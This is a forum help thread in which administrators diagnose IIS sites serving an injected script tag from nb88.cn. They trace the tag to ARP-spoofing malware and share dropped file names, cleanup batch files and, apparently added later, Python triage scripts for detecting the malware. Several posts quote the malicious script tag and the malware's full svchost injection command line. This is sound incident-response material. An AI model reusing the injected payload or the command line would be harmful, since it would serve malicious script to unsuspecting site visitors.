Solved

IIS server hacked "fuck th3 w0rld" entered into title - cannot find infection anywhere

Posted on 2008-06-22
1,576 Views
Last Modified: 2008-06-28
Hi, my web servers, all IIS, have been compromised. We are not sure how, although we think it may have been SQL injection. The following

Fuck Th3 W0rld!" and it is injected into the source code of every Java-enabled website. We cannot clean it nor find the source of the spreading. Here is the Java source: <script language="JavaScript" src="http://nb88.cn/search/vip.js"></script><title>**** Th3 W0rld!</title> <HTML>

I have run spyware scans and virus scans, and cannot determine where the infection is coming from,
and I have had to stop my web servers. Does anybody have any clue?

This is an emergency.
0
Question by:blueswitch
36 Comments
 
LVL 31

Expert Comment

by:moorhouselondon
ID: 21839976
I'm sure you've done this already, but...

First off, turn off access to your site; no one is going to thank you for screwing up their system.
0
 

Author Comment

by:blueswitch
ID: 21839980
That has already been done; now I'm trying anything and everything to find the infection.
0
 
LVL 31

Expert Comment

by:moorhouselondon
ID: 21839992
Your website has an SQL engine embedded in it? If so, check that parameters sent to the engine are properly validated. As I understand it, SQL injection is about putting formatting characters into a form. The contents of that form are served up to the SQL engine, the engine executes the command, but that command now contains a very different type of command to what you intended it to contain. So what you've got to do is to strip out all characters that could set up such a command.
0
 

Author Comment

by:blueswitch
ID: 21839994
Our problem is that the hack has already happened; IIS has been compromised.
The database and code are OK.

When I move the database and code to a clean server, the site is normal again,
so my only conclusion is that the server has somehow been modified; however, I can't find it.
0
 
LVL 31

Expert Comment

by:moorhouselondon
ID: 21840000
Have you checked things like Stored Procedures?
0
 

Author Comment

by:blueswitch
ID: 21840006
No,

but as I mentioned, I have physically moved all database files, as well as the web code, to a previously uninfected machine, and the infection does not follow.
Also it affects ASP pages not using databases, so I have determined that it is infecting IIS.
0
 
LVL 31

Expert Comment

by:moorhouselondon
ID: 21840018
Whether or not IIS is still infected: if a hacker repeats the injection technique on this new server, are you still vulnerable?  Code that deals with input from outside sources needs to be checked to ensure input is thoroughly sanitised.
0
 
LVL 31

Expert Comment

by:moorhouselondon
ID: 21840022
0
 

Author Comment

by:blueswitch
ID: 21840023
Agreed, but for now we need to be able to get the sites back up.
0
 
LVL 31

Expert Comment

by:moorhouselondon
ID: 21840029
Not a pleasant Sunday for you...
0
 

Author Comment

by:blueswitch
ID: 21840034
Not at all.
0
 
LVL 31

Expert Comment

by:moorhouselondon
ID: 21840054
0
 

Author Comment

by:blueswitch
ID: 21840062
Interesting.

Here I think it's a variant of those attacks where they managed to get the IIS server infected.
0
 
LVL 31

Expert Comment

by:moorhouselondon
ID: 21840063
0
 

Author Comment

by:blueswitch
ID: 21840073
These are very interesting, but the problem is I have a new variant, and my IIS is infected.
I'm really at a standstill.
0
 
LVL 31

Expert Comment

by:moorhouselondon
ID: 21840077
The articles suggested looking through the logs - you know roughly when the infection started, have a look at transactions occurring a tad prior to that time.  If you don't have the logs then you will need to set the system going and monitor it stringently until it gets infected again.
0
 
LVL 1

Accepted Solution

by:
adds21 earned 500 total points
ID: 21840134
Okay. We've now fixed our problem.

Firstly, it would appear there is nothing running on the webservers themselves.  It looks to me like a process running on the SQL Server is affecting the IIS machines (maybe via DCOM?).  

In our case, we found that rebooting the SQL Server machine *and not logging onto it* fixed the problem.  As soon as someone logged onto the machine either via TS, or on the console, the problem came back.

So, we looked at the /run regkey, and sure enough it was running an unknown process at user login - I'm sorry, I can't remember what the process was called (just wanted to delete it!), but that has now fixed our problem.

Of course, we also had a number of other nasties on the SQL server which need to be sorted, but at least we have a little more time to fix that.

So, I would recommend looking very closely at your SQL servers.  Turn them off if necessary and see if the problem goes away on the web servers.  If it does, at least you know where to look.

It's been a long night!
0
 
LVL 31

Expert Comment

by:moorhouselondon
ID: 21840166
Good news indeed.  The SQL coding needs to be reviewed for vulnerabilities, as mentioned.

You shouldn't be running two accounts on EE.  I suggest you do something about that too!
0
 

Expert Comment

by:stephenevans
ID: 21840241
Long night indeed. Thanks adds21, your post pointed me in the right direction. If you find more information please do post it. I'm back up and running but not sure how; with all the things I tried, I'm not sure which one sorted the issue.
0
 

Author Comment

by:blueswitch
ID: 21840406
adds21,
what did you find? If it's on the SQL server, what was the process called?

What do I look for?

0
 

Author Comment

by:blueswitch
ID: 21840409
I just restarted my SQL server; it didn't seem to have an effect. I didn't see any process.
0
 
LVL 31

Expert Comment

by:moorhouselondon
ID: 21840458
Blueswitch:-

Are you doing this on the new, uninfected machine, or the infected one?  
0
 

Author Comment

by:blueswitch
ID: 21840469
On the infected one. I have many web and SQL servers; here's what I have found out so far.

1. The infection has some type of logic, as it will not show the profanity in the title if the IP of the computer browsing the site is on the same subnet as the infected machine,

meaning all local machines on my network do not see the profanity on all the sites.
This has been verified by using a load balancer, which masks the user IP and makes it appear as an internal user; when I placed an infected machine behind the load balancer, the outside world did not see the profanity.

2. I think it's on the web server and IIS, not SQL, as when I used a clean IIS machine (that has SQL installed)
and used that, while transferring the entire database folder, including the master, msdb etc., to the IIS machine from an infected machine, the problem went away.

0
 

Author Comment

by:blueswitch
ID: 21840649
One more thing: it only affects port 80,
so if the site is under SSL the hack does not take effect.
Has anybody else been affected?
0
 

Author Comment

by:blueswitch
ID: 21841357
OK

The problem has been resolved. The problem is on the SQL server, as posted above. It's an ARP attack:
a SQL injection attack installs an executable on one of the SQL servers;
that SQL server becomes a pseudo gateway intercepting all web traffic and appending the code above.

It does not modify SQL or IIS in any way.


0
 

Author Comment

by:blueswitch
ID: 21841912
Additionally, while it may appear many machines are infected, only one is infected (a SQL server),
and it has some program running that's intercepting the ARP traffic and causing all the problems.

Isaac
0
 

Expert Comment

by:stephenevans
ID: 21854270
As an update, I've been unable to find the source of the SQL injection, but scanning the SQL Server for files modified on Sat 21st 2008 at 7pm I found files relating to the following:

http://www.sophos.com/security/analyses/viruses-and-spyware/w32rbotgvm.html

wpcap.dll and the other files can indeed enable uploaded files to access the network card at the network level and hence mess with ARP and other traffic.

Stephen
0
 

Expert Comment

by:RandyMontgomery
ID: 21867599
blueswitch,

What is the name of the exe? I still cannot find it on any of my servers.
0
 

Expert Comment

by:stephenevans
ID: 21870124
The EXE was called wapsrv.exe; it had a created date of the 21st. The full list of files that were created is as follows.

System32\drivers\npf.sys
System32\packet.dll
System32\wpcap.dll
System32\wanpacket.dll
System32\wapsrv.exe
0
 

Expert Comment

by:RTPIT
ID: 21870222
Thank you stephenevans!   Finally a real fix instead of the 'I fixed it but have no clue what I did or how it works' posts we had been seeing.
0
 

Expert Comment

by:RTPIT
ID: 21872098
I found the culprit. I made 2 scripts, one for 2000 and one for XP/Server.

2000.bat
del c:\WINNT\system32\packet.dll
del c:\WINNT\system32\wanpacket.dll
del c:\WINNT\system32\wapsrv.exe
del c:\WINNT\system32\wpcap.dll
del c:\WINNT\system32\drivers\npf.sys
pause

XP/Server
del c:\windows\system32\packet.dll
del c:\windows\system32\wanpacket.dll
del c:\windows\system32\wapsrv.exe
del c:\windows\system32\wpcap.dll
del c:\windows\system32\drivers\npf.sys
pause

These batches did find some files and delete them, but eventually I found one machine with access denied on the deletion. After looking over the processes there was only one svchost.exe process run by the local user account; its switches were:

C:\WINDOWS\system32\svchost.exe -idx 0 -ip 192.168.5.1-192.168.5.255 -port 80 -insert "<script language="""JavaScript""" src="""http://nb88.cn/search/vip.js"""></script><title>Fuck Th3 W0rld!</title>"

Thanks again stephenevans
0
 

Expert Comment

by:RTPIT
ID: 21872270
svchost.exe was being run from c:\windows\system32\waptimes.exe

Triggered from HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
0
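The posts above give a concrete host-side picture of the injecting machine: the WinPcap components plus wapsrv.exe and waptimes.exe on disk, a Run key launcher, and an svchost.exe whose command line carries -ip/-port/-insert arguments instead of the usual -k service group. The following is an added triage script (not code from any poster) that checks a process listing against those indicators; the process rows are constructed sample data in the shape of "wmic process get ProcessId,ExecutablePath,CommandLine" output, and the names in INDICATOR_FILES are taken from this thread.

```python
import re
from pathlib import PureWindowsPath

# File names the thread reports being dropped on the injecting machine, plus the
# Run-key launcher waptimes.exe. WinPcap components can be legitimate on their own;
# the combination with wapsrv.exe/waptimes.exe is the signal.
INDICATOR_FILES = {"packet.dll", "wanpacket.dll", "wapsrv.exe", "wpcap.dll",
                   "npf.sys", "waptimes.exe"}
# Arguments seen on the injector's svchost.exe command line; genuine svchost
# instances are launched with "-k <group>" and never carry these.
INJECTOR_ARGS = re.compile(r"(?:^|\s)-(?:insert|ip|port|idx)\b", re.IGNORECASE)

# Constructed process listing (pid, executable path, command line); not real data.
SAMPLE_PROCESSES = [
    (1020, r"C:\WINDOWS\system32\svchost.exe",
     r"C:\WINDOWS\system32\svchost.exe -k netsvcs"),
    (2188, r"C:\WINDOWS\system32\svchost.exe",
     r'C:\WINDOWS\system32\svchost.exe -idx 0 -ip 192.168.5.1-192.168.5.255 '
     r'-port 80 -insert "<script language=""JavaScript"" src=""http://nb88.cn/search/vip.js""></script>"'),
    (2410, r"C:\WINDOWS\system32\waptimes.exe", r"C:\WINDOWS\system32\waptimes.exe"),
    (2500, r"C:\Program Files\Wireshark\wireshark.exe",
     r'"C:\Program Files\Wireshark\wireshark.exe"'),
]

def flag_process(path, cmdline):
    """Return a reason string if the process matches the thread's indicators, else None."""
    name = PureWindowsPath(path).name.lower()
    if name in INDICATOR_FILES:
        return f"known dropped file {name}"
    if name == "svchost.exe" and INJECTOR_ARGS.search(cmdline):
        return "svchost.exe with packet-injection arguments (-ip/-port/-insert)"
    return None

def triage(processes):
    """Run flag_process over (pid, path, cmdline) rows; return [(pid, reason), ...]."""
    hits = []
    for pid, path, cmdline in processes:
        reason = flag_process(path, cmdline)
        if reason:
            hits.append((pid, reason))
    return hits

if __name__ == "__main__":
    for pid, reason in triage(SAMPLE_PROCESSES):
        print(f"PID {pid}: {reason}")
```

A hit on the svchost.exe rule identifies the machine that is rewriting traffic; the file and Run-key entries are then what to remove, as RTPIT describes.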
 

Expert Comment

by:RandyMontgomery
ID: 21881348
First of all thank you all for your input.

I checked every server on my network and none of the following files "packet.dll, wanpacket.dll, wapsrv.exe, wpcap.dll, npf.sys and waptimes.exe" were found on my servers. Also checked my processes using Process Explorer on each server and did not find anything abnormal. The virus seems to come and go, and when it's active it severely slows down the internet and LAN/WAN traffic. I even tried Wireshark to find the misc traffic from each server. Symantec stops the VIP.js and its other names on the workstations. Any of your admins running Symantec Endpoint Protection on your network? Any other comments, ideas, thoughts to eradicate this bug?
0
 

Expert Comment

by:RTPIT
ID: 21891675
It doesn't have to be a server; the machine that we ended up finding it running on was an XP client PC.

If you can't find it via software try to isolate it with hardware, try to segment off some of the network with say another router.  Eventually you'll see some computers still affected while others won't be, maybe segment off a specific section of a building or an office.
0
 

Expert Comment

by:RandyMontgomery
ID: 21896818
I was under the impression that it was a server virus; thanks for the information. What anti-virus software are you running on the workstations?
0
 
LVL 23

Expert Comment

by:Admin3k
ID: 21929837
For the sake of Google & search engines:

http://www.symantec.com/security_response/writeup.jsp?docid=2007-061222-0609-99

This is the original culprit, a low-profile worm that injects malicious HTML code into local HTTP traffic using ARP poisoning attacks. The IFrames injected differ, but the payload is usually executing JS/VBS trojan downloaders; McAfee detects it as Trojan VBS/PSYME, Kaspersky detects it as Trojan-Downloader.JS.Multi.cn.
Upon execution this will download further malware, some of which was extremely difficult to remove.

I cleaned up an infected LAN today by running Wireshark for a couple of minutes, identified the machine(s) which are performing the ARP spoofing & going there for a hands-on cleanup; once cleaned, other users who experienced the VBS/PSYME message
0
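Both blueswitch's explanation (ID 21841357: one infected box acting as a pseudo gateway and rewriting port 80 traffic, so nothing on the web servers is actually modified) and Admin3k's cleanup method (a short Wireshark capture to spot who is doing the ARP spoofing) come down to the same check: which MAC is answering ARP for addresses that belong to someone else. The script below is an added example, not code from any poster; it parses a constructed "sender IP, sender MAC" listing of ARP replies (the kind of thing you would export from a capture filtered on arp.opcode == 2) and reports MACs that answer for the gateway or for several hosts.

```python
import re
from collections import defaultdict

MAC_RE = re.compile(r"^(?:[0-9a-f]{2}:){5}[0-9a-f]{2}$")

# Constructed sample, not traffic from the thread: one ARP reply per line as
# "sender IP  sender MAC". 192.168.5.1 is the gateway; the host at 192.168.5.77
# starts answering for the gateway and for other hosts (classic poisoning).
SAMPLE_ARP_REPLIES = """\
192.168.5.1   00:11:22:33:44:01
192.168.5.20  00:11:22:33:44:20
192.168.5.77  00:aa:bb:cc:dd:77
192.168.5.1   00:aa:bb:cc:dd:77
192.168.5.20  00:aa:bb:cc:dd:77
192.168.5.30  00:aa:bb:cc:dd:77
"""

def parse_arp_replies(text):
    """Yield (ip, mac) pairs; lines that are not 'ip mac' are ignored."""
    for line in text.splitlines():
        parts = line.split()
        if len(parts) == 2 and MAC_RE.match(parts[1].lower()):
            yield parts[0], parts[1].lower()

def find_arp_spoofers(replies, gateway_ip, max_ips_per_mac=2):
    """Return {mac: [reasons]} for MACs behaving like a man-in-the-middle.

    Two signals: a MAC announcing an IP that an earlier reply attributed to a
    different MAC (for the gateway IP this is the poisoning symptom itself),
    and a MAC announcing more distinct IPs than a normal host would."""
    owner = {}                      # ip -> MAC that first announced it
    ips_by_mac = defaultdict(set)
    suspects = defaultdict(list)
    for ip, mac in replies:
        ips_by_mac[mac].add(ip)
        first = owner.setdefault(ip, mac)
        if first != mac:
            role = "gateway" if ip == gateway_ip else "host"
            suspects[mac].append(f"answers for {role} {ip}, first announced by {first}")
    for mac, ips in ips_by_mac.items():
        if len(ips) > max_ips_per_mac:
            suspects[mac].append(f"announces {len(ips)} different IPs")
    return dict(suspects)

if __name__ == "__main__":
    found = find_arp_spoofers(parse_arp_replies(SAMPLE_ARP_REPLIES), "192.168.5.1")
    for mac, reasons in found.items():
        print(mac, "->", "; ".join(reasons))
```

Raise max_ips_per_mac on segments where routers or multi-homed hosts legitimately answer for several addresses; the gateway-conflict rule is the reliable one either way.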
